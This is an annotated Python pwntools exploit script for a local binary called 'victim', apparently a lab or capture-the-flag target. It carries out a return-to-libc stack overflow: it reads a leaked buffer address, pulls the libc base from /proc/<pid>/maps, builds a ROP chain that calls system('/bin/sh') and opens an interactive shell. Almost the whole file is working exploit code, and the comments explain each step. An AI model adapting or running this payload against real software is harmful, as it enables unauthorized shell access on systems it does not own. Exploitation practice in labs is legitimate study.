#!/usr/bin/env python
from pwn import *
import binascii
# Local exploit script (Python 2 syntax: `print` statements below) for the
# './victim' binary. It builds a return-to-libc style payload: the target
# leaks a buffer address, libc's load address is read from /proc/<pid>/maps,
# and a stack overflow is used to call system() on a "/bin/sh" string that
# lives inside the same payload.

# Parse the system libc once so its symbol table gives us the offset of
# system() relative to the library's base address.
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# Spawn the target as a child process; all I/O below goes through `p`.
p = process('./victim')
# Hard-coded offset of a gadget inside this specific libc build. Given the
# payload layout (gadget, pointer, system) it is presumably a single
# "pop rdi; ret" gadget used to load the first argument — TODO confirm
# against the exact libc version on the box.
gadget_offset = 0x21102
system_offset = libc.symbols['system']
# The target prints one line containing a buffer address in hex; int(...,16)
# tolerates the trailing newline (and an optional 0x prefix).
buf_addr_str = p.recvuntil('\n')
buf_addr = int(buf_addr_str, 16)
# NOTE(review): `os` is not imported explicitly here; it is presumably
# re-exported by `from pwn import *`.
# NOTE(review): locating the child via `ps aux | grep victim` is fragile —
# the pattern can match the grep command itself or any unrelated process
# whose command line contains "victim", and `sed -n 1p` takes the first hit
# blindly. The process object already knows its own child's pid.
pid=os.popen("ps aux | grep victim | sed -n 1p | awk '{ print $2 }'").read().strip('\n')
# Read the child's memory map and take the start address of the first libc
# mapping whose permission string contains "xp" (i.e. r-xp). Whether that
# line is the library's base depends on how this libc is mapped — verify
# that gadget_addr/system_addr come out right before trusting it.
cmd = "cat /proc/"+str(pid)+"/maps | grep libc | grep \"xp\" | awk -F \"-\" '{ print $1 }'"
libc_addr = int(os.popen(cmd).read(), 16)
# Rebase the libc-relative offsets onto the live load address.
gadget_addr = libc_addr + gadget_offset
system_addr = libc_addr + system_offset
# Where "/bin/sh" lands inside the leaked buffer: 72 bytes of padding plus
# three 8-byte pointers = 96 bytes (written here as 64 + 8 + 24), matching
# the payload layout built below.
binsh_addr = buf_addr + 64 + 8 + 24
# Debug output of every computed value (Python 2 print statements).
print "gadget_offset : " + hex(gadget_offset)
print "system_offset : " + hex(system_offset)
print "buf_addr : " + hex(buf_addr)
print "libc_addr : " + hex(libc_addr)
print "gadget_addr : " + hex(gadget_addr)
print "system_addr : " + hex(system_addr)
print "binsh_addr : " + hex(binsh_addr)
# Drain whatever the target has printed so far before sending the payload.
p.recv()
# Payload: 72 zero bytes of padding up to the saved return address, then the
# gadget, its argument (pointer to the "/bin/sh" string appended at the end),
# the return into system(), and finally the string itself.
payload = "\x00"*72 + p64(gadget_addr) + p64(binsh_addr) + p64(system_addr) + "/bin/sh"
p.send(payload)
# Hand the terminal over to the (hopefully) spawned shell.
p.interactive()